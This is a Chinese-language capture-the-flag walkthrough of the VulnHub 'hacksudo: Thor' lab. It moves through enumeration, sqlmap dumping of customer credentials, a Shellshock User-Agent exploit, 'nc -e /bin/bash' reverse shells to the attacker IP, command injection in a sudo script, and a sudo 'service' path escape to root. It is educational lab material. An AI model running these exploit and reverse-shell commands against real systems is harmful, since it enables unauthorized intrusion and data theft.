Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)

Hacksudo Thor

作者:jason huawen

靶机信息

名称:hacksudo: Thor

地址:

https://www.vulnhub.com/entry/hacksudo-thor,733/

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:19:6b:c1      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.160  08:00:27:94:4e:34      1      60  PCS Systemtechnik GmbH      

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.160

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 21:49 EDT
Nmap scan report for localhost (192.168.56.160)
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:94:4E:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds

NMAP扫描结果显示目标主机有2个开放端口:22(ssh)、80(http),21端口状态为过滤

获得Shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nikto -h http://192.168.56.160
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.160
+ Target Hostname:    192.168.56.160
+ Target Port:        80
+ Start Time:         2023-04-25 21:52:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-04-25 21:53:39 (GMT-4) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.160
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,sh,txt,js,bak,php
[+] Timeout:                 10s
===============================================================
2023/04/25 21:54:31 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 5357]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/navbar.php           (Status: 200) [Size: 1515]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/customer_profile.php (Status: 302) [Size: 7274] [--> home.php]
Progress: 1540415 / 1543927 (99.77%)

Gobuster工具没有扫描出有价值的目录或者文件,更换字典继续扫描:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.txt,.js,.bak 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.160
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              sh,txt,js,bak,php,html
[+] Timeout:                 10s
===============================================================
2023/04/25 21:59:22 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/contact.php          (Status: 200) [Size: 4164]
/news.php             (Status: 200) [Size: 8062]
/home.php             (Status: 200) [Size: 5345]
/index.php            (Status: 200) [Size: 5357]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/header.php           (Status: 200) [Size: 472]
/connect.php          (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/navbar.php           (Status: 200) [Size: 1515]
/transactions.php     (Status: 302) [Size: 8163] [--> home.php]
/admin_login.php      (Status: 200) [Size: 1511]

更换字典后,扫描出/admin_login.php文件,接下来看如何突破用户登录:

首先看能否利用登录绕开语句,但是没有成功。

利用Burpsuite拦截用户登录请求,存储为文件req.txt,

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req.txt --level=3                                                             
        ___
       __H__                                                                                                                                                 
 ___ ___["]_____ ___ ___  {1.6.7#stable}                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                    
|___|_  [(]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:08:45 /2023-04-25/


但是SQLMAP没有扫描出SQL注入漏洞,在感觉不知道下一步怎么干的时候,尝试一下另外一个目录扫描工具dirsearch,这次有收获:

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                      
                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/192.168.56.160/_23-04-25_22-12-41.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_22-12-41.log


dirsearch扫描出目标有/README.md文件,访问该文件,好像有用户名和密码信息

However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

可以成功登陆/admin_login.php

这页是否存在SQL注入漏洞?

利用Burpsuite拦截该页请求,存储为文件req2.txt,再用sqlmap扫描一下

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3
GET parameter 'cust_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

说明目标站点的cust_id存在SQL注入漏洞。

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 --dbs
available databases [4]:
[*] hacksudo
[*] information_schema
[*] mysql
[*] performance_schema


得到数据库列表

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo --tables
Database: hacksudo
[12 tables]
+--------------+
| admin        |
| beneficiary1 |
| beneficiary2 |
| beneficiary3 |
| beneficiary4 |
| customer     |
| news         |
| news_body    |
| passbook1    |
| passbook2    |
| passbook3    |
| passbook4    |
+--------------+

(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T admin --columns
Database: hacksudo
Table: admin
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int(11)  |
| pwd    | char(25) |
| uname  | char(25) |
+--------+----------+

这个表的信息已经没有价值,看一下其他表。

─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T customer -C uname,pwd --dump+---------+-----------+
| uname   | pwd       |
+---------+-----------+
| zakee94 | nafees123 |
| salman  | salman123 |
| jon     | snow123   |
| tushar  | tushar123 |


将上述用户名和密码分别作为字典登录ssh,均失败,但注意到news.php文件源代码中有注释:

<!-- cgi-bin ---!> 

所以/cgi-bin/目录下可能有cgi文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160/cgi-bin/ -f -e cgi 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                      
                                                                                                                                                             
Extensions: cgi | HTTP method: GET | Threads: 30 | Wordlist size: 13603

Output File: /home/kali/.dirsearch/reports/192.168.56.160/-cgi-bin-_23-04-25_23-25-10.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_23-25-10.log

Target: http://192.168.56.160/cgi-bin/

[23:25:10] Starting: 
[23:25:12] 403 -  279B  - /cgi-bin/.ht_wsr.txt                             
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.orig                          
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.bak1
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessBAK
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.sample                        
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_sc
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessOLD
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess.save
[23:25:12] 403 -  279B  - /cgi-bin/.htaccessOLD2
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_orig
[23:25:12] 403 -  279B  - /cgi-bin/.htm
[23:25:12] 403 -  279B  - /cgi-bin/.htaccess_extra
[23:25:12] 403 -  279B  - /cgi-bin/.html
[23:25:12] 403 -  279B  - /cgi-bin/.htpasswd_test
[23:25:12] 403 -  279B  - /cgi-bin/.httr-oauth                             
[23:25:12] 403 -  279B  - /cgi-bin/.htpasswds
[23:25:13] 403 -  279B  - /cgi-bin/.php                                    
[23:25:31] 500 -  612B  - /cgi-bin/backup.cgi           

可能存在破壳漏洞

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.160
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 23:30 EDT
Nmap scan report for bogon (192.168.56.160)
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at 
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.38 (Debian) Server at bogon Port 80</address>
|   </body></html>
|   
|     References:
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds

NMAP脚本扫描结果可知目标站点存在shellshock漏洞

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.56.160/cgi-bin/backup.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

接下来设法得到反弹的shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.230 5555'" http://192.168.56.160/cgi-bin/backup.cgi

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 49396
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ cd /home
cd /home
bash-4.3$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Aug  2  2021 .
drwxr-xr-x 18 root root 4.0K Jul 29  2021 ..
drwxrwx---  5 thor thor 4.0K Aug  2  2021 thor
bash-4.3$ cd thor
cd thor
bash: cd: thor: Permission denied
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : ljgg
ljgg
Hey Dear ! I am ljgg , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!

发现可以输入任意的secret key,然后在Secret message处即可执行命令,因此下一步可以spawn一个新的shell,而得到用户thor

bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

HELLO want to talk to Thor?

Enter Thor  Secret Key : ddd
ddd
Hey Dear ! I am ddd , Please enter your Secret massage : nc -e /bin/bash 192.168.56.230 6666
nc -e /bin/bash 192.168.56.230 6666

在Kali Linux上成功得到了用户thor的shell

──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 6666
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 42452
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
python -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/home$ 

提权

thor@HacksudoThor:~$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
thor@HacksudoThor:~$ sudo /usr/sbin/service ../../bin/sh
sudo /usr/sbin/service ../../bin/sh
# cd /root
cd /root
# ls -alh
ls -alh
total 64K
drwx------  6 root root 4.0K Jul 30  2021 .
drwxr-xr-x 18 root root 4.0K Jul 29  2021 ..
-rw-------  1 root root  302 Aug  2  2021 .bash_history
-rw-r--r--  1 root root  598 Jun 24  2021 .bashrc
drwxr-xr-x  3 root root 4.0K Jun 24  2021 .cache
drwx------  3 root root 4.0K Jun 11  2021 .gnupg
-rw-------  1 root root   28 Jun 24  2021 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 11  2021 .local
-rw-------  1 root root 2.4K Jul 30  2021 .mysql_history
-rw-r--r--  1 root root  144 Jun 23  2021 .pearrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Aug  2  2021 .ssh
-rw-r--r--  1 root root  493 Jun 15  2021 .wget-hsts
-rw-r--r--  1 root root 7.0K Jul 30  2021 proof.txt
-rw-------  1 root root    7 Aug  2  2021 root.txt
# cat root.txt
cat root.txt
rooted
# 

热门相关:超武穿梭   第一神算:纨绔大小姐   寂静王冠   薄先生,情不由己   惊世毒妃:轻狂大小姐